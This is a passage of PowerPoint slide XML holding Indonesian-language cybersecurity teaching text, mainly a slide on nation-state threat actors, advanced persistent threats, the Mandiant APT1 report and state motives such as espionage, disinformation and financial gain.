            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pun yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersambung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tamu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IoT, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memerlukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebelumnya</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202</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3484566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Aktor Negara-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Bangsa</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Sebagian </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> negara </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bangsa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengembangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keahlian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>senjata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencapai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tujuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>militer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komersial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Laporan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> APT1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Mandiant </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> unit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>spionase</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Tiongkok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membentuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahasa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemahaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siklus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Istilah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>persisten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lanjut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>advanced persistent threat/APT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diciptakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memahami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perilaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendasari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis-jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>musuh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> modern. Alih-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berpikir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerangka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terinfeksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> virus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Trojan, APT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengacu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemampuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>musuh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencapai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kompromi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkelanjutan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendapatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempertahankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Aktor negara-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bangsa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terlibat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terutama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>energi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesehatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemilihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Tujuan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> negara </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terutama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disinformasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>spionase</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendapatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keuntungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>strategis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> negara - Korea Utara </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menargetkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendapatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keuntungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>finansial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Aktor negara </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bekerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemerintah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nasional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>militer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dinas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mensponsori</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempertahankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyangkalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
